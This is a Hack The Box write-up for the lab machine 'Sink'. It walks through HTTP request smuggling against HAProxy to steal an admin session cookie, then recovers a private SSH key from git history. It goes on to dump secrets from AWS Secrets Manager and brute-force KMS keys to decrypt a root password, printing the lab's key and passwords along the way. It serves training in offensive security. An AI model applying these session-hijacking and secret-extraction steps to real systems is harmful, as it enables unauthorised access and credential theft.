Hack The Box - Sink

Sink is an Insane rated machine on HackThebox by MrR3boot which features a misconfiguration in a proxy that leads to HTTP-request-smuggling and access to a gitea application. In the gitea application we will dig through git logs to find a ssh key allowing us to log in as marcus. Next we will interact with AWS to retrieve a password for david. Finally we will use AWS again to query through keys and decrypt an encrypted archive which contains a yaml file with the root users password.

User

Nmap

We start our enumeration with a nmap scan on all ports, followed by a script and version detection scan on the open ones.

All ports

1 2 3 4 5 6 7 8 9 10 11

$ sudo nmap -p- -T4 10.129.186.209 Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-14 13:02 GMT Nmap scan report for 10.129.186.209 Host is up (0.054s latency). Not shown: 65532 closed ports PORT STATE SERVICE 22/tcp open ssh 3000/tcp open ppp 5000/tcp open upnp Nmap done: 1 IP address (1 host up) scanned in 65.95 seconds

Script and version

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68

$sudo nmap -p22,3000,5000 -sC -sV 10.129.186.209 Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-14 13:05 GMT Nmap scan report for 10.129.186.209 Host is up (0.026s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA) | 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA) |_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519) 3000/tcp open ppp? | fingerprint-strings: | GenericLines, Help: | HTTP/1.1 400 Bad Request | Content-Type: text/plain; charset=utf-8 | Connection: close | Request | GetRequest: | HTTP/1.0 200 OK | Content-Type: text/html; charset=UTF-8 | Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647 | Set-Cookie: i_like_gitea=6b0912499618100f; Path=/; HttpOnly | Set-Cookie: _csrf=HXs5kLtalxUspgbCsvobxqVdkms6MTYyODk0NjQyOTk5MDY0NjM0Mw; Path=/; Expires=Sun, 15 Aug 2021 13:07:09 GMT; HttpOnly | X-Frame-Options: SAMEORIGIN | Date: Sat, 14 Aug 2021 13:07:09 GMT | <!DOCTYPE html> | <html lang="en-US" class="theme-"> | <head data-suburl=""> | <meta charset="utf-8"> | <meta name="viewport" content="width=device-width, initial-scale=1"> | <meta http-equiv="x-ua-compatible" content="ie=edge"> | <title> Gitea: Git with a cup of tea </title> | <link rel="manifest" href="/manifest.json" crossorigin="use-credentials"> | <meta name="theme-color" content="#6cc644"> | <meta name="author" content="Gitea - Git with a cup of tea" /> | <meta name="description" content="Gitea (Git with a cup of tea) is a painless | HTTPOptions: | HTTP/1.0 404 Not Found | Content-Type: text/html; charset=UTF-8 | Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647 | Set-Cookie: i_like_gitea=584057494e42233c; Path=/; HttpOnly | Set-Cookie: _csrf=T8BL8aSPLWtVJQk5Rp_m1X2FwCs6MTYyODk0NjQzNTE0MzEwNTMzNg; Path=/; Expires=Sun, 15 Aug 2021 13:07:15 GMT; HttpOnly | X-Frame-Options: SAMEORIGIN | Date: Sat, 14 Aug 2021 13:07:15 GMT | <!DOCTYPE html> | <html lang="en-US" class="theme-"> | <head data-suburl=""> | <meta charset="utf-8"> | <meta name="viewport" content="width=device-width, initial-scale=1"> | <meta http-equiv="x-ua-compatible" content="ie=edge"> | <title>Page Not Found - Gitea: Git with a cup of tea </title> | <link rel="manifest" href="/manifest.json" crossorigin="use-credentials"> | <meta name="theme-color" content="#6cc644"> | <meta name="author" content="Gitea - Git with a cup of tea" /> |_ <meta name="description" content="Gitea (Git with a c 5000/tcp open http Gunicorn 20.0.0 |_http-server-header: gunicorn/20.0.0 |_http-title: Sink Devops 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port3000-TCP:V=7.91%I=7%D=8/14%Time=6117BF9C%P=x86_64-pc-linux-gnu%r(Ge ...[snip]... SF:>\n\t<meta\x20name=\"description\"\x20content=\"Gitea\x20\(Git\x20with\ SF:x20a\x20c"); Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 90.13 seconds

HTTP-request-smuggling

Going over to port 3000 we see a gitea hosting default page.

Clicking on Explore=>Users we can identify possible usernames for the application and note them down for later.

On port 5000 there is gunicorn application, which let’s us register a user.

After signing up and logging in it looks like a blog and note keeping application.

Looking at a request submitting a comment to the blogpost we see a haproxy installation which might be vulnerable to CVE-2019-18277. The setup in the blogpost describing this vulnerability looks very similar to the setup at hand.

For it to work we have to obfuscate the Transfer-Encoding header with a vertical tab. This way the frontend proxy does not recognize it and forwards the request as a whole. The backend server however parses the header and sees two requests instead of one. Since the Content-Length in the next request is not reached a request by another user might get concatenated to our request. First we need to create the vertical tab in burp. We use python to do this and base64 encode it.

1 2	$ python -c "print('\v', end='')" | base64 Cw==

In Burp we then can decode it again in front of the chuncked value. Next we add an empty chunk which signifies the end of the request for the backend. Now we add another request to ours, also posting to comment using our cookie with a Content-Length longer as the message specified. This enables the next users request to get concatenated to ours.

Refreshing the page after about a minute(if we are too quick our own request gets concatenated), we see the start of another users http request in a comment field. The request doesn’t display any useful information yet sadly though because our Content-Length of 100 in the second request was too small.

We send another request increasing the Content-Length of the smuggled request to 300 this time.

Refreshing the page again after some time we were able to capture the full session cookie this time.

Replacing our cookie and refreshing, we are now logged in as the administrator user of the page.

Notes

Logged in as the admin we can now read his notes which reveals 3 username password pairs with a website and a short note.

NR	Note	URL	Username	Password
1	Chef Login	http://chef.sink.htb	chefadm	/6'fEGC&zEx{4]zz
2	Dev Node	http://code.sink.htb	root	FaH@3L>Z3})zzfQ3
3	Nagios	https://nagios.sink.htb	nagios_adm	g8<H6GK\{*L.fB3C

Root already appeared as the usernames on gitea and trying this set of credentials we can log into gitea.

Key_Management

Going over to repositories, from the four being present Key_Management sounds the most interesting.

To have a better look at it we download it locally.

1 2 3 4 5 6 7 8 9 10

$ git clone http://10.129.186.209:3000/root/Key_Management Cloning into 'Key_Management'... Username for 'http://10.129.186.209:3000': root Password for 'http://root@10.129.186.209:3000': remote: Enumerating objects: 2630, done. remote: Counting objects: 100% (2630/2630), done. remote: Compressing objects: 100% (1230/1230), done. remote: Total 2630 (delta 1079), reused 2600 (delta 1067) Receiving objects: 100% (2630/2630), 2.26 MiB | 8.17 MiB/s, done. Resolving deltas: 100% (1079/1079), done

Looking at the git history we see some interesting commits made by marcus.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54

$ git log commit 86ca6d11824a1b5c9527e0d60961cb0c653ac014 (HEAD -> master, origin/master, origin/HEAD) Author: marcus <marcus@sink.htb> Date: Wed Dec 2 09:16:11 2020 +0000 rotation fix on dev commit 3e22d986a0da242bd371fd14971e8eab1b56bef4 Author: marcus <marcus@sink.htb> Date: Wed Dec 2 09:10:32 2020 +0000 endpoint fix commit f380655b3abfc05cdd14141cff7a8cf0e60977e9 Author: marcus <marcus@sink.htb> Date: Wed Dec 2 09:09:08 2020 +0000 Preparing for Prod commit b01a6b7ed372d154ed0bc43a342a5e1203d07b1e Author: marcus <marcus@sink.htb> Date: Wed Dec 2 09:07:54 2020 +0000 Adding EC2 Key Management Structure commit 780f37fe507f05c9dfbaa1de0c371335415b7e21 Author: marcus <marcus@sink.htb> Date: Wed Dec 2 06:35:17 2020 +0000 Remove aggressive actions commit adba0abc75ab6ef2d9bd6a0d8b51fa66fa05e986 Author: marcus <marcus@sink.htb> Date: Wed Dec 2 06:33:38 2020 +0000 Updating key policies commit f20e6f6698ed1a75dcf23a113120675f480d6200 Author: marcus <marcus@sink.htb> Date: Wed Dec 2 06:29:03 2020 +0000 adding code for listing keys from prod and dev nodes commit d0e1b004491bb9b8cf3be315cfd8071b61867369 Author: marcus <marcus@sink.htb> Date: Wed Dec 2 06:26:00 2020 +0000 pushing aws-sdk commit ae23ca5b95123d5e9310c7887c0392fe7ab570f3 Author: root <admin@sink.htb> Date: Wed Dec 2 06:24:10 2020 +0000 Initial commit

Checking out the difference between the head and commit b01a6b7ed372d154ed0bc43a342a5e1203d07b1e which states to add EC2 Key Management Structure, we find a private ssh key.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51

$ git diff 86ca6d11824a1b5c9527e0d60961cb0c653ac014 b01a6b7ed372d154ed0bc43a342a5e1203d07b1e diff --git a/.keys/dev_keys b/.keys/dev_keys new file mode 100644 index 0000000..a9acff4 --- /dev/null +++ b/.keys/dev_keys @@ -0,0 +1,38 @@ +-----BEGIN OPENSSH PRIVATE KEY----- +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 +-----END OPENSSH PRIVATE KEY----- diff --git a/README.md b/README.md index 782f239..135664a 100644 --- a/README.md +++ b/README.md @@ -1,4 +1,3 @@ ...[snip]...

With this key we can now log in as the user marcus, after setting the correct permissions on it and grab the user flag

1 2 3 4 5 6 7 8 9 10 11

$ vi marcus $ chmod 600 marcus $ ssh -i marcus marcus@sink.htb The authenticity of host 'sink.htb (10.129.71.3)' can't be established. ECDSA key fingerprint is SHA256:7+5qUqmyILv7QKrQXPArj5uYqJwwe7mpUbzD/7cl44E. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added 'sink.htb' (ECDSA) to the list of known hosts. ...[snip]... Last login: Wed Jan 27 12:14:16 2021 from 10.10.14.4 marcus@sink:~$ ls user.txt

Root

Marcus => David

Listing all the ports listening on localhost we identify AWS on port 4566.

1 2 3 4 5 6

marcus@sink:~$ ss -ln | grep 127.0.0.1 tcp LISTEN 0 4096 127.0.0.1:4566 0.0.0.0:* tcp LISTEN 0 100 127.0.0.1:25 0.0.0.0:* tcp LISTEN 0 4096 127.0.0.1:33145 0.0.0.0:* tcp LISTEN 0 70 127.0.0.1:33060 0.0.0.0:* tcp LISTEN 0 151 127.0.0.1:3306 0.0.0.0:*

Checking the health of the AWS service we see 3 services running.

1 2	marcus@sink:~$ curl 127.0.0.1:4566/health {"services": {"logs": "running", "secretsmanager": "running", "kms": "running"}}

To interact with the endpoint we have to first configure the AWS cli.

1 2 3 4 5

marcus@sink:~$ aws configure AWS Access Key ID [None]: AKIAIOSFODNN7EXAMPLE AWS Secret Access Key [None]: wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY Default region name [None]: us-west-2 Default output format [None]: json

The secretsmanager looks interesting and we are able to list all the secrets contained in it.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21

marcus@sink:~$ aws --endpoint-url="http://127.0.0.1:4566" secretsmanager list-secrets { "SecretList": [ { "ARN": "arn:aws:secretsmanager:us-east-1:1234567890:secret:Jenkins Login-rJNDd", "Name": "Jenkins Login", "Description": "Master Server to manage release cycle 1", "KmsKeyId": "", "RotationEnabled": false, "RotationLambdaARN": "", "RotationRules": { "AutomaticallyAfterDays": 0 }, "Tags": [], "SecretVersionsToStages": { "506b3175-c48b-4ecb-9ea7-d82c843d9f92": [ "AWSCURRENT" ] } }, ...[snip]...

Retrieving all the secrets from the secretsmanager, we get 3 usernames and 3 passwords.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33

marcus@sink:~$ aws --endpoint-url="http://127.0.0.1:4566" secretsmanager get-secret-value --secret-id "arn:aws:secretsmanager:us-east-1:1234567890:secret:Jenkins Login-rJNDd" { "ARN": "arn:aws:secretsmanager:us-east-1:1234567890:secret:Jenkins Login-rJNDd", "Name": "Jenkins Login", "VersionId": "506b3175-c48b-4ecb-9ea7-d82c843d9f92", "SecretString": "{\"username\":\"john@sink.htb\",\"password\":\"R);\)ShS99mZ~8j\"}", "VersionStages": [ "AWSCURRENT" ], "CreatedDate": 1618235159 } marcus@sink:~$ aws --endpoint-url="http://127.0.0.1:4566" secretsmanager get-secret-value --secret-id "arn:aws:secretsmanager:us-east-1:1234567890:secret:Sink Panel-UnbOd" { "ARN": "arn:aws:secretsmanager:us-east-1:1234567890:secret:Sink Panel-UnbOd", "Name": "Sink Panel", "VersionId": "f8f25159-bf02-40a6-ba7a-57115edabf92", "SecretString": "{\"username\":\"albert@sink.htb\",\"password\":\"Welcome123!\"}", "VersionStages": [ "AWSCURRENT" ], "CreatedDate": 1618235159 } marcus@sink:~$ aws --endpoint-url="http://127.0.0.1:4566" secretsmanager get-secret-value --secret-id "arn:aws:secretsmanager:us-east-1:1234567890:secret:Jira Support-LSzMV" { "ARN": "arn:aws:secretsmanager:us-east-1:1234567890:secret:Jira Support-LSzMV", "Name": "Jira Support", "VersionId": "2f7ac49a-3739-4e43-a369-cb26f6910bd8", "SecretString": "{\"username\":\"david@sink.htb\",\"password\":\"EALB=bcC=`a7f2#k\"}", "VersionStages": [ "AWSCURRENT" ], "CreatedDate": 1618235159 }

Since David is the only other user and he is also mentioned in the secrets, we use his password to switch to his account.

David => Root

In David’s home directory there is an encrypted file servers.enc in the Projects folder.

Looking for a fitting key to open the lock we configure AWS-CLI again for David and enumerate AWS KMS.

1 2 3 4 5 6

david@sink:~/Projects/Prod_Deployment$ aws configure AWS Access Key ID [None]: AKIAIOSFODNN7EXAMPLE AWS Secret Access Key [None]: wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY Default region name [None]: us-west-2 Default output format [None]: json david@sink:~/Projects/Prod_Deployment$

We can list all the keys within KMS and also look at the encryption algorithms possible with a key.

1 2 3 4 5 6 7

david@sink:~/Projects/Prod_Deployment$ aws --endpoint-url="http://127.0.0.1:4566/" kms list-keys { "Keys": [ { "KeyId": "0b539917-5eff-45b2-9fa1-e13f0d2c42ac", "KeyArn": "arn:aws:kms:us-east-1:000000000000:key/0b539917-5eff-45b2-9fa1-e13f0d2c42ac" ...[snip]...

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20

david@sink:~/Projects/Prod_Deployment$ aws --endpoint-url="http://127.0.0.1:4566/" kms describe-key --key-id "0b539917-5eff-45b2-9fa1-e13f0d2c42ac" { "KeyMetadata": { "AWSAccountId": "000000000000", "KeyId": "0b539917-5eff-45b2-9fa1-e13f0d2c42ac", "Arn": "arn:aws:kms:us-east-1:000000000000:key/0b539917-5eff-45b2-9fa1-e13f0d2c42ac", "CreationDate": 1609757848, "Enabled": false, "Description": "Encryption and Decryption", "KeyUsage": "ENCRYPT_DECRYPT", "KeyState": "Disabled", "Origin": "AWS_KMS", "KeyManager": "CUSTOMER", "CustomerMasterKeySpec": "RSA_4096", "EncryptionAlgorithms": [ "RSAES_OAEP_SHA_1", "RSAES_OAEP_SHA_256" ] } }

There 11 keys with multiple possible algorithms per key. So it is best for us to not manually try each combination. In a first step we extract all the key ids from the endpoint like this.

1	david@sink:~/Projects/Prod_Deployment$ aws --endpoint-url="http://127.0.0.1:4566/" kms list-keys | grep KeyId | awk -F\" '{print $4}' > /tmp/key_ids

The second step is to get all the possible possible encryption algorithms, which we can do in the first command and then manually add them to a file.

1 2 3 4 5 6 7 8 9 10

david@sink:~/Projects/Prod_Deployment$ for key in $(cat /tmp/key_ids); do aws --endpoint-url="http://127.0.0.1:4566/" kms describe-key --key-id "$key"; done { "KeyMetadata": { "AWSAccountId": "000000000000", "KeyId": "0b539917-5eff-45b2-9fa1-e13f0d2c42ac", "Arn": "arn:aws:kms:us-east-1:000000000000:key/0b539917-5eff-45b2-9fa1-e13f0d2c42ac", "CreationDate": 1609757848, "Enabled": false, "Description": "Encryption ...[snip]...

1 2 3 4 5 6 7

david@sink:~/Projects/Prod_Deployment$ echo RSAES_OAEP_SHA_1 > /tmp/enc david@sink:~/Projects/Prod_Deployment$ echo RSAES_OAEP_SHA_256 >> /tmp/enc david@sink:~/Projects/Prod_Deployment$ echo SYMMETRIC_DEFAULT >> /tmp/enc david@sink:~/Projects/Prod_Deployment$ cat /tmp/enc RSAES_OAEP_SHA_1 RSAES_OAEP_SHA_256 SYMMETRIC_DEFAULT

With all preperations done we can now try all keys with the possible decryptions methods on the servers.enc

1

david@sink:~/Projects/Prod_Deployment$ for enc in $(cat /tmp/enc); do for key in $(cat /tmp/key_ids); do aws --endpoint-url="http://127.0.0.1:4566/" kms enable-key --key-id "$key"; aws --endpoint-url="http://127.0.0.1:4566/" kms decrypt --key-id "$key" --ciphertext-blob fileb:///home/david/Projects/Prod_Deployment/servers.enc --encryption-algorithm $enc --output text --query Plaintext; done;done

All of them but one error out but the succeeding one gives us a base64 encoded object.

1 2 3 4

...[snip]... An error occurred (InternalFailureException) when calling the Decrypt operation (reached max retries: 4): key type not yet supported for decryption H4sIAAAAAAAAAytOLSpLLSrWq8zNYaAVMAACMxMTMA0E6LSBkaExg6GxubmJqbmxqZkxg4GhkYGhAYOCAc1chARKi0sSixQUGIry80vwqSMkP0RBMTj+rbgUFHIyi0tS8xJTUoqsFJSUgAIF+UUlVgoWBkBmRn5xSTFIkYKCrkJyalFJsV5xZl62XkZJElSwLLE0pwQhmJKaBhIoLYaYnZeYm2qlkJiSm5kHMjixuNhKIb40tSqlNFDRNdLU0SMt1YhroINiRIJiaP4vzkynmR2E878hLP+bGALZBoaG5qamo/mfHsCgsY3JUVnT6ra3Ea8jq+qJhVuVUw32RXC+5E7RteNPdm7ff712xavQy6bsqbYZO3alZbyJ22V5nP/XtANG+iunh08t2GdR9vUKk2ON1IfdsSs864IuWBr95xPdoDtL9cA+janZtRmJyt8crn9a5V7e9aXp1BcO7bfCFyZ0v1w6a8vLAw7OG9crNK/RWukXUDTQATEKRsEoGAWjYBSMglEwCkbBKBgFo2AUjIJRMApGwSgYBaNgFIyCUTAKRsEoGAWjYBSMglEwRAEATgL7TAAoAAA= ...[snip]..

The base64 blob turns out to be a gzip compressed file with a tar archive inside. Decompressing and opening it gives us a new password.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19

$ echo -n H4sIAAAAAAAAAytOLSpLLSrWq8zNYaAVMAACMxMTMA0E6LSBkaExg6GxubmJqbmxqZkxg4GhkYGhAYOCAc1chARKi0sSixQUGIry80vwqSMkP0RBMTj+rbgUFHIyi0tS8xJTUoqsFJSUgAIF+UUlVgoWBkBmRn5xSTFIkYKCrkJyalFJsV5xZl62XkZJElSwLLE0pwQhmJKaBhIoLYaYnZeYm2qlkJiSm5kHMjixuNhKIb40tSqlNFDRNdLU0SMt1YhroINiRIJiaP4vzkynmR2E878hLP+bGALZBoaG5qamo/mfHsCgsY3JUVnT6ra3Ea8jq+qJhVuVUw32RXC+5E7RteNPdm7ff712xavQy6bsqbYZO3alZbyJ22V5nP/XtANG+iunh08t2GdR9vUKk2ON1IfdsSs864IuWBr95xPdoDtL9cA+janZtRmJyt8crn9a5V7e9aXp1BcO7bfCFyZ0v1w6a8vLAw7OG9crNK/RWukXUDTQATEKRsEoGAWjYBSMglEwCkbBKBgFo2AUjIJRMApGwSgYBaNgFIyCUTAKRsEoGAWjYBSMglEwRAEATgL7TAAoAAA= | base64 -d > 1 $ file 1 1: gzip compressed data, from Unix, original size modulo 2^32 10240 $ mv 1 1.gz && gunzip 1.gz $ file 1 1: POSIX tar archive (GNU) $ tar -xvf 1 servers.yml servers.sig $ cat servers.yml server: listenaddr: "" port: 80 hosts: - certs.sink.htb - vault.sink.htb defaultuser: name: admin pass: _uezduQ!EY5AHfe2

Using this password we can now switch to the root user on sink.

1 2 3 4 5 6 7

david@sink:~/Projects/Prod_Deployment$ su root Password: root@sink:/home/david/Projects/Prod_Deployment# id uid=0(root) gid=0(root) groups=0(root) root@sink:/home/david/Projects/Prod_Deployment# wc -c /root/root.txt 33 /root/root.txt root@sink:/home/david/Projects/Prod_Deployment#